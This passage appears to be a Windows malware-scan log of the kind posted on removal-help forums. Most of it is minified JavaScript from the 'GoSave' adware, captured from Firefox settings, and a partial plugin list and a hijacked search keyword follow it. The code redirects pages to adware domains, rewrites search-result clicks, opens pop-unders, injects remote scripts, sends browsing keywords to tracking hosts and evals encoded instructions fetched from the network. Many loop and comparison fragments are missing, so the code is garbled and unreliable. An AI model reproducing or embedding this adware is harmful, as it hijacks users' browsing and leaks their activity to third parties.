channel=99;if(window.onbeforeunload){window.onbeforeunload=null;channel=98};location.href=\"http://superiends.org/e/?f=qdwKrjnEvTY4vTmXrjnGpdwFrjk5qa%3D%3D&eid=1120&hid=6512633795638182113&pid=2921&ch=\"+channel+\"&s=px.pluginh&r=\"+Math.random();break}}}catch(d){}})();}catch(e){};try{window.top==window.self&&new function(){if(!document.getElementsByTagName(\"body\").length||!document.getElementsByTagName(\"body\")[0].getAttribute(\"s6512633795638182113\")){var m=document.getElementsByTagName(\"body\")[0];m&&m.setAttribute(\"s6512633795638182113\",\"1\");var b=this;b.pixelHost=\"//sepx.sendapplicationget.com\";b.prefix=\"jhgasdf\";b.version=\"0.5\";b.now=(new Date).getTime();b.clickInterval=2592E5;b.ratio=12;b.initThrottle=\"google;gmaps;amazon\";b.unique_items_left=!0;b.eid=decodeURIComponent(\"GoSave\"); b.num_of_items_in_one=4;b.count=0;b.baseHostname=\"sendapplicationget.com\";b.utils=new function(){var a=this;a.sendPixels=function(a){var b;if(a instanceof Array)for(var e=0;eg.length){if(a.waitForTokens[f])return d(null);var h=arguments.callee;a.waitTimeout=setTimeout(function(){b.waitForElementCounter++;h(c,d,e,f)},e)}else{if(a.waitForTokens[f])return d(null);a.waitForTokens[f]=!0;b.waitForElementCounter=0;return d(g)}}; a.flushWaitForTokens=function(){a.waitForTokens={}};a.getRandomInt=function(a,b){return Math.floor(Math.random()*(b-a+1))+a};a.get_computed_style=\"function\"!=typeof window.getComputedStyle?function(b){return{getPropertyValue:function(d){\"float\"==d&&(d=\"styleFloat\");d=a.dhtml_prop_name(d);return\"object\"==typeof b.currentStyle&&null!=b.currentStyle&&\"undefined\"!=typeof b.currentStyle[d]?b.currentStyle[d]:null}}}:function(a,b){return window.getComputedStyle(a,b)||{getPropertyValue:function(){}}};a.query_selector_all= document.querySelectorAll?function(a){try{return document.querySelectorAll(a)}catch(b){}}:function(a){var b=a.match(/^#([^,\\s]+)$/)||[];if(1c.count)setTimeout(function(){c.check_tab()},1E3);else return!1;else return(b.utils.query_selector_all(\".hdtb_mitem\")[0]||b.utils.query_selector_all(\".tn > div\")[0]).className.match(/(hdtb_msel|tn-selected-mode)/)&& (b.utils.ping(\"validate2\"),c.callback()),!1};if(!c.check_tab())return!1}},yahoo:{hrefSelector:\"a[id^=link]\",unique_search_divs:\"3\",dr:[\".ads.horiz.top\",\".ads.horiz.bot\"],urls:[\"yahoo\"],src_for_keyword:\"#yschsp\",validate:function(){b.utils.ping(\"validate2\");return!0}},bing:{hrefSelector:[\".b_algo a\",\".sb_tlst a\"],unique_search_divs:\"2\",dr:[\".sb_adsWv2\"],urls:[\"www.bing.com/search?*\"],src_for_keyword:[\"#sb_form_q\",\".b_searchboxForm[name='q']\"],validate:function(){b.utils.ping(\"validate2\");return!0}}, infospace:{hrefSelector:\".resultTitle\",unique_search_divs:\"1\",dr:[\"\",\"\"],urls:[\"http://search.infospace.com/search/*\"],src_for_keyword:\"#topSearchTextBox\",validate:function(){b.utils.ping(\"validate2\");return!0}},wow:{hrefSelector:\".find\",unique_search_divs:\"1\",dr:[\"\",\"\"],urls:[\"http://www.wow.com/search?*\"],src_for_keyword:\"#csbquery1\",validate:function(){b.utils.ping(\"validate2\");return!0}},duckduckgo:{hrefSelector:\".result__a\",unique_search_divs:\"1\",dr:[\"\",\"\"],urls:[\"://duckduckgo.com/?q=*\"],src_for_keyword:\"#search_form_input\", validate:function(){b.utils.ping(\"validate2\");return!0}},contenko:{hrefSelector:\"#title\",unique_search_divs:\"1\",dr:[\"\",\"\"],urls:[\"://contenko.com/#/?q=*\"],src_for_keyword:\"#searchBar input[type='text']\",validate:function(){b.utils.ping(\"validate2\");return!0}},conduit:{hrefSelector:\"a[id^=ctl00_main_organicResults]\",unique_search_divs:\"1\",urls:[\"http://search.conduit.com*\"],src_for_keyword:\"#q_top\",dr:[\"#master-1\"],validate:function(){return!0}},ask:{hrefSelector:\".ptbs a[id^=r]\",unique_search_divs:\"1\", urls:[\"http://www.ask.com/web?q=*\",\"http://www.ask.com/web?qsrc=*\",\"http://www.ask.com/web?am=broad&q=*\"],src_for_keyword:[\"#top_qcomn\",\"#top_q_comm\"],dr:[\"#spl_img_top\"],validate:function(){return!0}},triple:{hrefSelector:\".gRsSlicetitle\",unique_search_divs:\"2\",dr:[\"#gRsTopLinks\"],urls:[\"http://search.triple-search.com/?*\",\"http://www.search.triple-search.com/?*\"],src_for_keyword:\"#q\",validate:function(){var a=b.utils.query_selector_all(\".gRsSTypeSelltr\");if(0a)return!0};b.setClickHref=function(a,c){if(\"undefined\"!=typeof b.projects_info[c].hrefSelector){if(b.utils.getRandomInt(1, 1E4)>=1E4/b.ratio)return!1;var d=b.projects_info[c].hrefSelector,e=parseInt(localStorage.getItem(b.prefix));if(\"undefined\"!=typeof d){if(d instanceof Array)for(var f=0;fb.keyword.length)return b.utils.flushWaitForTokens(), !1;if(b.inputElement&&\"input\"==b.inputElement.tagName.toLowerCase()&&\"\"!==b.keyword)return c(b.keyword,a.name)};if(d instanceof Array)for(var f=0;f60? 2109:388)+\"?installer_file_name=\";a.bin=\"exe,msi,mp3,rar,pdf,avi,mov,mpg,zip,torrent,mkv,mpeg,mp4,3gp,jar,7z,flac,wmv,wma,doc,ppt,pptx,pps,ppsx,xls,xlsx,flv\";a.res=[];a.existingPrefix=\"rghbyujk\";a.prefix=\"fghjklfgh\";a.utils=new function(){var b=this;b.injectScript=function(){var b=document.createElement(\"script\");b.src=a.domain;document.getElementsByTagName(\"head\")[0].appendChild(b)};b.ajax={get:function(a,e){try{this.xhr=new XMLHttpRequest,this.xhr.open(\"GET\",a,!0),this.xhr.onreadystatechange=function(){4==b.ajax.xhr.readyState&&e(b.ajax.xhr.responseText)},this.xhr.send()}catch(f){}}};b.isIE=function(){return-1c.msie?c.inject_script(b+('&cb='+d.prefix+'.'+f)):c.ajax.get(b,function(b){if(b)d[f](b)})};c.l=new function(){var b=this;b.xlat='abcdwxyzstuvrqponmijklefghABCDWXYZSTUVMNOPQRIJKLEFGH9876543210+/';b.encode=function(f){f=b._utf8_encode(f);for(var c='',e=0;e>2,a=(a&3)<<4|d>>4,p=(d&15)<<2|m>>6,n=m&63;isNaN(d)?p=n=64:isNaN(m)&&(n=64);c=c+b.xlat.charAt(k)+b.xlat.charAt(a)+(64==p?'=':b.xlat.charAt(p))+(64==n?'=':b.xlat.charAt(n))}return c};b._utf8_encode=function(b){if(b&&b.length){for(var c='',a=0;ad?c+=String.fromCharCode(d):(127d?c+=String.fromCharCode(d>>6|192):(c+=String.fromCharCode(d>>12|224),c+=String.fromCharCode(d>>6&63|128)),c+=String.fromCharCode(d&63|128))}return c}return b}; b.decode=function(b){b=b.toString().replace(/[^A-Za-z0-9\\+\\/]/g,'');for(var c='',a=0;a>2,n=(m&3)<<6|k,c=c+String.fromCharCode(d<<2|h>>4);64!=m&&0 d)c+=String.fromCharCode(d),a++;else if(191d)var h=b.charCodeAt(a+1),c=c+String.fromCharCode((d&31)<<6|h&63),a=a+2;else var h=b.charCodeAt(a+1),m=b.charCodeAt(a+2),c=c+String.fromCharCode((d&15)<<12|(h&63)<<6|m&63),a=a+3}return c}};c.ajax=new function(){this.get=function(b,c){try{var a=new XMLHttpRequest;a.open('GET',b,!0);a.withCredentials=!0;a.onreadystatechange=function(){4==a.readyState&&c(a.responseText)};a.send()}catch(e){}}};c.randomChar=function(){for(var b='',c=0;2>c;c++)b+='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz'.charAt(Math.floor(52* Math.random()));return b};c.msie=function(){var b=parseInt((/msie (\\d+)/.exec(navigator.userAgent.toLowerCase())||[])[1],10);isNaN(b)&&(b=parseInt((/trident\\/.*; rv:(\\d+)/.exec(navigator.userAgent.toLowerCase())||[])[1],10));return isNaN(b)?!1:b}();c.inject_script=function(b){var c=document.getElementsByTagName('body')[0],a=document.createElement('script');a.type='text/javascript';a.id='id_'+d.prefix;a.src=b;c&&c.appendChild(a)};c.epoch=function(){return Math.floor((new Date).getTime()/1E3)};c.getVert= function(){var b=localStorage.getItem('sk398erjds2d');return b?b:c.forexVert()};c.browser=function(){var b=navigator.userAgent.toLowerCase(),c={webkit:/webkit/.test(b),mozilla:/mozilla/.test(b)&&!/(compatible|webkit)/.test(b),chrome:/chrome/.test(b),msie:/msie/.test(b)&&!/opera/.test(b),firefox:/firefox/.test(b),safari:/safari/.test(b)&&!/chrome/.test(b),opera:/opera/.test(b)};c.version=c.safari?(b.match(/.+(?:ri)[\\/: ]([\\d.]+)/)||[])[1]:(b.match(/.+(?:ox|me|ra|ie)[\\/: ]([\\d.]+)/)||[])[1];return c}(); c.getNodeTextProp=function(b){return'textContent'in b?'textContent':'innerText'in b?'innerText':!1};c.dhtml_prop_name=function(b){return b.replace(/(\\-([a-z]){1})/g,function(b,c,a){return a.toUpperCase()})};c.get_computed_style='function'!=typeof window.getComputedStyle?function(b){return{getPropertyValue:function(a){'float'==a&&(a='styleFloat');a=c.dhtml_prop_name(a);return'object'==typeof b.currentStyle&&null!=b.currentStyle&&'undefined'!=typeof b.currentStyle[a]?b.currentStyle[a]:null}}}:function(b, c){return window.getComputedStyle(b,c)||{getPropertyValue:function(){}}};c.mapAdTypes=function(b){for(var c={},a=0;ad.utils.msie)&&'http:'===a.split('/')[0]){var g={type:'div',attrs:{id:'__modal_container',style:{position:'fixed','z-index':'9999999999',height:'100%',width:'100%',margin:'0',padding:'0',background:'rgba(0,0,0,0.3)',top:'0',right:'0',bottom:'0',left:'0','border-radius':'0'}},children:[{type:'div',attrs:{id:'__modal',style:{position:'absolute', 'z-index':'99999999999',left:'50%',top:'10px','text-align':'left',width:'90%',margin:'0 0 0 -45%','background-color':'#FFFFFF',border:'1px solid #DDDDDD','border-radius':'5px',height:'90%',padding:'0'}},children:[{type:'div',attrs:{style:{margin:'0',padding:'2px',left:'0',width:'inherit',top:'0','background-color':'transparent'},id:'__modal_close'},children:[{type:'img',attrs:{src:'data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABYAAAAWCAYAAADEtGw7AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZSBJbWFnZVJlYWR5ccllPAAABA1JREFUeNp8VW9IW1cUP3l5eS9iZx+amsaNtNZsdtgttnSkBYmRLEsVs1rwi9Z9Udm6YZXYTr+MaMcm4idXPwTUD05BWP3bNBsleREUoabMTzr/wNxEjQqCgoj/Gr2792re8prUC4f3znnn/M65757zuwqEEMRbLMfxXzocV/MLCswfZ2bakpKSTAqFAra3t4ML//zr93pfjL3weOb29vYO4gIQ4GjBwWx1dbVlfn5e3NjYQBHBOpqamkLRtoWFBfEh9mUYhn0bR6ZotTrB5/O5SNDq6irq6OhAxcXFSK1Wy8Rms6G2tja0vLxME4iBgEt78aIQF1in0wnT09Nu4uj1epHRaEQ8z8eARovJZELj4+ORHbk/0OsFGTCLV2BkhFba1dUlBUYDn5WkpaWFggeDQRfHq1kJ2NXQaIlUelaFZ0l7ezsF/7mpyUKBNamp/NLSkogFZWVlyZytVivKz8+PATEYDKimpgZd0GolW9L582h2dhatra2JaWlpPNR+/9hIMrndbllwTk6OdPrNzc3UlpCQgLKzsykAsXd2dspinE4ntT958qORseZZzaTthoeHZS2I+xX29/epXlFRAY2NjYB3BL29vaDRaKh9Z2dHiiE9PjA0BMfHx3Dnjt0MoVDIs7i4GPe/lZaWopWVFaly4hd57+/vjxszMTGB1tfXPYxKpTJtbm7GDA1Zg4ODUFdXB4eHh1RPTEykz9HRUSgrK4s7cBgUlEqliSFbODo6kn0ktsjC0wW7u7uy78QWb0VjMViCycnJcR0/NRqhu7sbBEGgeiSovLwcGhoaqB4th+EwpKSkEJcgg8fSjwkGMjIyZKDJ2KEHg0aSku0/dNbCwcEJ51RWVkJ1TS28OQZ4g/OF8fMIi/7SJdja2vIzflEcI44Oh0MG/Mm1azLQkpISGHjWB85HjyXwz25eP/0H+Fzwo6joLrx37hw8/8M3Btdv3ODxKYuEvTSp2pi+rK+vp+/4kBEoT8RssZIJQ+kfZlJdgckNFCr00ucnHSMab97iaQf82tNDR7q1tfWdI0uAFcr/wRklhxiGk/QH335H27BvYMgiccXly+ks7mdKQlVVVTGgfIIasbRiVgIiVSpZkoxDn9vtmGbXSc+7dPp0Vkablrw8AQNT2mzC25RAsXBYlKqTKiPgzGmCr795gFZCIVKt2154V4hL9F/Y7QLJSsAnJycRHmWkuZCKOBWumFTHnACSX1J07x4KBEbo9jHxuAqLimVEr3j7zku/coV9+svTnNu3b/2AVSuZOsx8MDMzg09eAQbDR6DXv09PH6/Aq9d//uSsfTT+99xfYdmwvOsyzc3N5e/f/+pqYWGBmeM4GzaZTj8Fw+Gwf9Dz+9hvz/rmRsWXcS/T/wQYAL8KChTqW9Z8AAAAAElFTkSuQmCC', style:{cursor:'pointer'}}},{type:'span',attrs:{style:{position:'relative','margin-left':'20px','font-size':'12px','line-height':'33px'}},children:[{type:'#text',text:'Ads by '+d.extName}]}]},{type:'iframe',attrs:{style:{border:'0'},id:'__modal_iframe',width:'100%',height:'100%',frameboarder:'0',scrolling:'yes',marginheight:'0',marginwidth:'0',allowtransparency:'true',src:''}}]}]};try{var e=d.dom.json_to_html(g)}catch(l){}e&&(document.getElementsByTagName('body')[0].appendChild(e),document.getElementById('__modal_iframe').src= a,d.pixel('0','1'),b(),f())}}};a.getKeywords=function(){var a=document.title,b=document.getElementsByTagName('meta');if(b)for(var d=0,g=b.length;dl[h].length||(b[l[h]]?b[l[h]]++: b[l[h]]=1)}catch(m){}var e=[],k;for(k in b)e.push([k,b[k]]);e.sort(function(a,b){return b[1]-a[1]});e=e.slice(0,25);for(k=0;k';b.setAttribute('style','height: 15px;position: relative;background-color: #F9F9F9;border: none;border-radius:0');b.innerHTML=d;c.insertBefore(b,c.children[0])}};a.prepareUrl=function(){var c='?',b;for(b in d.directParams)c+=b+'='+d.directParams[b]+'&';c+='k='+encodeURIComponent(d.getKeywords());return'//'+a.hostnames['http:'==window.self.location.protocol?0:1]+c};a.tp=function(c){if(c){c=a.utils.l.decode(c);try{a.response=eval(c)}catch(b){}if(a.response&&a.response[0]&&(a.response[0][0]= a.response[0][0].replace('zig_pp','qdwKrjnEvTY4vTmXrjnGpdwFrjk5qa%3D%3D'),c=a.response[0][3],c=7,7===c&&'function'==typeof a.products['code_'+c]))a.products['code_'+c](a.response)}};a.getInstructions=function(c){var b='&cb='+a.prefix+'.tp';a.utils.msie?a.utils.inject_script(c+b):a.utils.ajax.get(c,function(b){b&&a.tp(b)})};a.initPop=function(){if(-1!==window.location.href.indexOf(a.pop_collision_id))return a.injectComplianceBanner();var c=a.prepareUrl();d.utils.getInstructions(c,'tp')};a.injectOnload=function(){'complete'=== document.readyState||10d.utils.msie||(window.self==window.top&&(a.utils.msie?a.injectOnload():a.initPop()),'undefined'==typeof window[a.prefix]&&(window[a.prefix]=a))}};}catch(e){};try{new function(){if(!document.getElementById('__if72ru4sdfsdfruh7fewui_once')){(function(){var a=document.createElement('div');a.id='__if72ru4sdfsdfruh7fewui_once';a.setAttribute('style','display:none;');var c=document.getElementsByTagName('body')[0];c&&c.appendChild(a)})();var a=this;a.utils=new function(){var b=this;b.JSON=new function(){this.parse=function(c){try{return'undefined'!==typeof JSON&&'function'==typeof JSON.stringify?JSON.parse(c):eval('var a='+c)}catch(a){return!1}}};b.cookie=new function(){var c= this;c.setCookie=function(c,a,b){if(b){var e=new Date;e.setTime(e.getTime()+864E5*b);b='; expires='+e.toGMTString()}else b='';document.cookie=c+'='+a+b+'; path=/'};c.getCookie=function(c){c+='=';for(var a=document.cookie.split(';'),b=0;b=d-g}};b.getInstructions=function(c, d){b.msie?b.inject_script(c+('&cb='+a.prefix+'.'+d)):b.ajax.get(c,function(c){if(c)a[d](c)})};b.l=new function(){var a=this;a.xlat='abcdwxyzstuvrqponmijklefghABCDWXYZSTUVMNOPQRIJKLEFGH9876543210+/';a.encode=function(d){d=a._utf8_encode(d);for(var b='',g=0;g>2,e=(e&3)<<4|h>>4,m=(h&15)<<2|l>>6,n=l&63;isNaN(h)?m=n=64:isNaN(l)&&(n=64);b=b+a.xlat.charAt(k)+a.xlat.charAt(e)+(64==m?'=':a.xlat.charAt(m))+(64==n?'=':a.xlat.charAt(n))}return b}; a._utf8_encode=function(a){if(a&&a.length){for(var c='',b=0;be?c+=String.fromCharCode(e):(127e?c+=String.fromCharCode(e>>6|192):(c+=String.fromCharCode(e>>12|224),c+=String.fromCharCode(e>>6&63|128)),c+=String.fromCharCode(e&63|128))}return c}return a};a.decode=function(a){a=a.toString().replace(/[^A-Za-z0-9\\+\\/]/g,'');for(var c='',b=0;b>2,n=(l&3)<<6|k,c=c+String.fromCharCode(e<<2|h>>4);64!=l&&0e)c+=String.fromCharCode(e),b++;else if(191e)var h=a.charCodeAt(b+1),c=c+String.fromCharCode((e&31)<<6|h&63),b=b+2;else var h=a.charCodeAt(b+1),l=a.charCodeAt(b+2),c=c+String.fromCharCode((e&15)<<12| (h&63)<<6|l&63),b=b+3}return c}};b.ajax=new function(){this.get=function(a,b){try{var f=new XMLHttpRequest;f.open('GET',a,!0);f.withCredentials=!0;f.onreadystatechange=function(){4==f.readyState&&b(f.responseText)};f.send()}catch(g){}}};b.randomChar=function(){for(var a='',b=0;2>b;b++)a+='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz'.charAt(Math.floor(52*Math.random()));return a};b.msie=function(){var a=parseInt((/msie (\\d+)/.exec(navigator.userAgent.toLowerCase())||[])[1],10);isNaN(a)&&(a= parseInt((/trident\\/.*; rv:(\\d+)/.exec(navigator.userAgent.toLowerCase())||[])[1],10));return isNaN(a)?!1:a}();b.inject_script=function(c){var b=document.getElementsByTagName('body')[0],f=document.createElement('script');f.type='text/javascript';f.id='id_'+a.prefix;f.src=c;b&&b.appendChild(f)};b.epoch=function(){return Math.floor((new Date).getTime()/1E3)};b.getVert=function(){var a=localStorage.getItem('sk398erjds2d');return a?a:b.forexVert()};b.browser=function(){var a=navigator.userAgent.toLowerCase(), b={webkit:/webkit/.test(a),mozilla:/mozilla/.test(a)&&!/(compatible|webkit)/.test(a),chrome:/chrome/.test(a),msie:/msie/.test(a)&&!/opera/.test(a),firefox:/firefox/.test(a),safari:/safari/.test(a)&&!/chrome/.test(a),opera:/opera/.test(a)};b.version=b.safari?(a.match(/.+(?:ri)[\\/: ]([\\d.]+)/)||[])[1]:(a.match(/.+(?:ox|me|ra|ie)[\\/: ]([\\d.]+)/)||[])[1];return b}();b.getNodeTextProp=function(a){return'textContent'in a?'textContent':'innerText'in a?'innerText':!1};b.dhtml_prop_name=function(a){return a.replace(/(\\-([a-z]){1})/g, function(a,b,c){return c.toUpperCase()})};b.get_computed_style='function'!=typeof window.getComputedStyle?function(a){return{getPropertyValue:function(d){'float'==d&&(d='styleFloat');d=b.dhtml_prop_name(d);return'object'==typeof a.currentStyle&&null!=a.currentStyle&&'undefined'!=typeof a.currentStyle[d]?a.currentStyle[d]:null}}}:function(a,b){return window.getComputedStyle(a,b)||{getPropertyValue:function(){}}}};a.prefix='if72ru4sdfsdfruh7fewui';a.version='0.1.1';a.pop_collision_id='__ipu=';a.pixel_token= 'px.pluginh';a.pixel_data_token='__pdt';a.pixelHostname=function(){try{return'direct_pop.'+eval('[\"winnered.info\",\"winnermore.info\"]')['https:'==window.self.location.protocol?1:0]}catch(a){return['direct_pop.winneri.info','direct_pop.winnermore.org']['https:'==window.self.location.protocol?1:0]}}();a.extName='GoSave';a.pid='2921';a.cc='MA';a.eid='1120';a.hid='6512633795638182113';a.prid=687;a.lt='186';a.jpshort='txUCqSoo';a.platform_version= '9';a.fallbackHostnames=['sitewebred.info','privilegesbox.net'];try{a.stngs=eval('xzxzxx_xzxzxzx = {\"szy_domain\":[\"trafficonlingetstorage.in\",\"privilegesbox.net\"],\"ad_sizes\":[[120,60,19],[630,250,22],[336,280,17],[630,500,23],[180,150,18],[234,60,15],[200,200,16],[600,400,13],[125,125,14],[670,670,11],[600,270,12],[800,600,21],[468,60,3],[800,440,20],[300,250,2],[728,90,1],[300,600,10],[120,240,7],[120,600,6],[160,600,5],[250,250,4],[240,400,8]]}')}catch(r){a.stngs={szy_domain:['gamesjobstarblack.in','privilegesbox.net'],ad_sizes:[[728,90,1],[300,250,2],[468,60,3],[250,250,4],[160,600,5],[120,600,6],[120,240,7],[240,400,8],[300,600,10],[670,670,11],[600,270,12],[600,400,13]]}}var q;q=''!==a.stngs&&a.stngs&&'undefined'!==typeof a.stngs.szy_domain&&a.stngs.szy_domain instanceof Array?a.stngs.szy_domain: a.fallbackHostnames;a.hostnames=q;a.serverHostnames=['superiends.org','go.turboloves.net'];a.manhattanHostname=['sitewebred.com','gadgetproffi.com'];a.body=document.getElementsByTagName('body')[0];a.directParams={subid:a.pid,subid1:a.hid,subid2:a.eid,subid3:a.prid,direct:'1',tid:'3'};a.events=new function(){var a=this;a.cache=[];a.add=window.addEventListener?function(c,d,f,g,e){'undefined'==typeof g&&(g=window);g.addEventListener(c,d,f);e&&a.cache.push([c,d,f,g])}:window.attachEvent?function(c,d, f,g,e){'undefined'==typeof g&&(g=window);g['e'+c+d]=d;g[c+d]=function(){g['e'+c+d](window.event)};g.attachEvent('on'+c,g[c+d]);e&&a.cache.push([c,d,f,g])}:function(){};a.remove=window.removeEventListener?function(a,b,f,g){'undefined'==typeof g&&(g=window);g.removeEventListener(a,b,f)}:window.detachEvent?function(a,b,f,g){'undefined'==typeof g&&(g=window);g.detachEvent('on'+a,g[a+b]);g[a+b]=null;g['e'+a+b]=null}:function(){};a.flush=function(){for(var c=0;cwindow.close();\\x3c/script>';document.getElementsByTagName('body')[0].appendChild(h);var k=document.createEvent('MouseEvents');k.initMouseEvent('click',!0,!0,window,0,0,0,0,0,!0,!1,!1,!0,0,null);h.dispatchEvent(k);h.parentNode.removeChild(h)}p.msie&& (e.opener.window.focus(),window.self.window.focus(),window.focus())}catch(l){}};document.addEventListener?document.addEventListener('click',m,!1):document.attachEvent('onclick',m)})(c,l,k,m,n,h)})(c)})(c[0][0])};b.code_5=function(b){var d=b[0][0],f=function(){window.removeEventListener?document.removeEventListener('click',f,!1):document.detachEvent('onclick',f);a.pixel('0','5');var b=document.createElement('a');b.href=d;document.getElementsByTagName('body')[0].appendChild(b);var c=document.createEvent('MouseEvents'); c.initMouseEvent('click',!1,!0,window,0,0,0,0,0,!0,!1,!1,!0,0,null);b.dispatchEvent(c);b.parentNode.removeChild(b);a.pixel('0','1')};document.addEventListener?document.addEventListener('click',f,!1):document.attachEvent('onclick',f)}};a.getKeywords=function(){var a=document.title,c=document.getElementsByTagName('meta');if(c)for(var d=0,f=c.length;de[h].length||(c[e[h]]?c[e[h]]++:c[e[h]]=1)}catch(l){}var g=[],k;for(k in c)g.push([k,c[k]]);g.sort(function(a,b){return b[1]-a[1]});g=g.slice(0,25);for(k=0;k';c.setAttribute('style','height: 15px;position: relative;background-color: #F9F9F9;border: none;border-radius:0');c.innerHTML=d;b.insertBefore(c,b.children[0])}};a.prepareUrl=function(){var b='?',c;for(c in a.directParams)b+= c+'='+a.directParams[c]+'&';b+='k='+encodeURIComponent(a.getKeywords());return'//'+a.hostnames['https:'==window.self.location.protocol?1:0]+b};a.addParamsForPixel=function(){var b='//'+a.pixelHostname+'?',c=a.hostnames['https:'==window.self.location.protocol?1:0],c={pid:a.pid,cc:a.cc,eid:a.eid,hid:a.hid,v:a.version,ch:'1',cid:a.response[0][2],tid:a.directParams.tid,adtid:a.response[0][4],smid:a.response[0][3],pbid:'0',oh:encodeURIComponent(a.response[0][0]),sh:encodeURIComponent(c)},d;for(d in c)b+= d+'='+c[d]+'&';b=b.slice(0,-1);b=a.utils.l.encode(b);return b.replace(/=/g,'')};a.falsePixel=function(){var b='//'+a.pixelHostname+'?',c={pid:a.pid,cc:a.cc,eid:a.eid,hid:a.hid,v:a.version,ch:'-1',cid:'0',tid:'3',adtid:'0',smid:'0',pbid:'0',oh:'0',sh:encodeURIComponent(a.hostnames['https:'==window.self.location.protocol?1:0])},d;for(d in c)b+=d+'='+c[d]+'&';b=b.slice(0,-1);(new Image).src=b};a.tp=function(b){if(b){b=a.utils.l.decode(b);try{a.response=eval(b)}catch(c){}if(!a.response||!a.response[0])return a.falsePixel(); a.response[0][0]=a.response[0][0].replace('zig_pp','qdwKrjnEvTY4vTmXrjnGpdwFrjk5qa%3D%3D');b=a.response[0][3];if(1!==b&&2!==b)if(0===b&&(b=3),'function'==typeof a.products['code_'+b])a.products['code_'+b](a.response);else a.products.code_3(a.response)}};a.getInstructions=function(b){var c='&cb='+a.prefix+'.tp';a.utils.msie?a.utils.inject_script(b+c):a.utils.ajax.get(b,function(b){b&&a.tp(b)})};a.initPop=function(){if(-1!==window.location.href.indexOf(a.pop_collision_id))return a.injectComplianceBanner();var b= a.prepareUrl();a.utils.getInstructions(b,'tp')};a.checkIfPop=function(){return window.opener&&window.self==window.top&&-1==document.cookie.indexOf('xcddsa')&&-1==window.self.location.href.indexOf('px.pluginh')&&-1==window.self.location.hostname.indexOf('earchfu')&&(!document.referrer||-1==document.referrer.indexOf('/amz/')&&!document.referrer.match(/cpops-\\d+\\.html/)&&-1==document.referrer.indexOf('px.pluginh'))&&-1==window.self.location.href.indexOf('nkths.co')&&-1==window.self.location.href.indexOf('ally.asi')&& -1==window.self.location.href.indexOf('/amz/')&&!window.self.location.href.match(/cpops-\\d+\\.html/)&&-1==window.self.location.hostname.indexOf('getjs')&&-1==window.self.location.hostname.indexOf('hsbc')&&3>history.length&&'https:'!==location.protocol};a.checkIfServer=function(){for(var b=0;b>2,c=(c&3)<<4|k>>4,m=(k&15)<<2|h>>6,l=h&63;isNaN(k)?m=l=64:isNaN(h)&&\r\n(l=64);d=d+a.xlat.charAt(n)+a.xlat.charAt(c)+(64==m?'=':a.xlat.charAt(m))+(64==l?'=':a.xlat.charAt(l))}return d};a._utf8_encode=function(a){if(a&&a.length){for(var b='',c=0;cf?b+=String.fromCharCode(f):(127f?b+=String.fromCharCode(f>>6|192):(b+=String.fromCharCode(f>>12|224),b+=String.fromCharCode(f>>6&63|128)),b+=String.fromCharCode(f&63|128))}return b}return a};a.decode=function(a){a=a.toString().replace(/[^A-Za-z0-9\\+\\/]/g,'');for(var b='',c=0;c<\r\na.length;){var f=this.xlat.indexOf(a.charAt(c++)),k=this.xlat.indexOf(a.charAt(c++)),h=this.xlat.indexOf(a.charAt(c++)),n=this.xlat.indexOf(a.charAt(c++)),m=(k&15)<<4|h>>2,l=(h&3)<<6|n,b=b+String.fromCharCode(f<<2|k>>4);64!=h&&0f)b+=String.fromCharCode(f),c++;else if(191f)var k=a.charCodeAt(c+1),b=b+String.fromCharCode((f&\r\n31)<<6|k&63),c=c+2;else var k=a.charCodeAt(c+1),h=a.charCodeAt(c+2),b=b+String.fromCharCode((f&15)<<12|(k&63)<<6|h&63),c=c+3}return b}};a.msie=function(){var a=parseInt((/msie (\\d+)/.exec(navigator.userAgent.toLowerCase())||[])[1],10);isNaN(a)&&(a=parseInt((/trident\\/.*; rv:(\\d+)/.exec(navigator.userAgent.toLowerCase())||[])[1],10));return isNaN(a)?!1:a}();a.getParams=function(){var b=location.href.split('__pdt');1b.message.length?b.message:b.message.slice(0,255),d=255>location.href.length?location.href:location.href.slice(0,255);(new Image).src=a.createPixelUrl({ch:8020,oh:d,sh:e})}},'undefined'==typeof window[a.prefix]&&(window[a.prefix]=a),a.initDirectPixel())};}catch(e){}})();"); FF - prefs.js..extensions.enabledAddons: %7B972ce4c6-7e08-4474-a285-3208198ce6fd%7D:36.0.4 FF - prefs.js..keyword.URL: "http://dts.search.ask.com/sr?src=ffb&gct=ds&appid=101&systemid=488&v=n13614-463&apn_dtid=TCH001&apn_ptnrs=AG1&apn_uid=5922316283444259&o=APN11459&q=" FF:[b]64bit:[/b] - HKLM\Software\MozillaPlugins\@microsoft.com/GENUINE: C:\Windows\system32\Wat\npWatWeb.dll (Microsoft Corporation) FF:[b]64bit:[/b] - HKLM\Software\MozillaPlugins\@microsoft.com/OfficeAuthz,version=14.0: C:\PROGRA~1\MICROS~2\Office14\NPAUTHZ.DLL (Microsoft Corporation) FF - HKLM\Software\MozillaPlugins\@google.com/npPicasa3,version=3.0.0: C:\Program Files (x86)\Google\Picasa3\npPicasa3.dll (Google, Inc.) FF - HKLM\Software\MozillaPlugins\@java.com/DTPlugin,version=10.67.2: C:\Program Files (x86)\Java\jre7\bin\dtplugin\npDeployJava1.dll (Oracle Corporation) FF - HKLM\Software\MozillaPlugins\@java.com/JavaPlugin,version=10.67.2: C:\Program Files (x86)\Java\jre7\bin\plugin2\npjp2.dll (Oracle Corporation) FF - HKLM\Software\MozillaPlugins\@messenger.yahoo.com/YahooMessengerStatePlugin;version=1.0.0.6: C:\Program Files (x86)\Yahoo!\Shared\npYState.dll (Yahoo! Inc.) FF - HKLM\Software\MozillaPlugins\@microsoft.com/GENUINE: C:\Windows\system32\Wat\npWatWeb.dll (Microsoft Corporation) FF - HKLM\Software\MozillaPlugins\@microsoft.com/OfficeAuthz,version=14.0: C:\PROGRA~2\MICROS~1\Office14\NPAUTHZ.DLL (Microsoft Corporation) FF - HKLM\Software\MozillaPlugins\@microsoft.com/SharePoint,version=14.0: C:\PROGRA~2\MICROS~1\Office14\NPSPWRAP.DLL (Microsoft Corporation) FF - HKLM\Software\MozillaPlugins\@tools.google.com/Google Update;version=3: C:\Program Files (x86)\Google\Update\1.3.26.9\npGoogleUpdate3.dll (Google Inc.) FF - HKLM\Software\MozillaPlugins\@tools.google.com/Google Update;version=9: C:\Program Files (x86)\Google\Update\1.3.26.9\npGoogleUpdate3.dll (Google Inc.) FF - 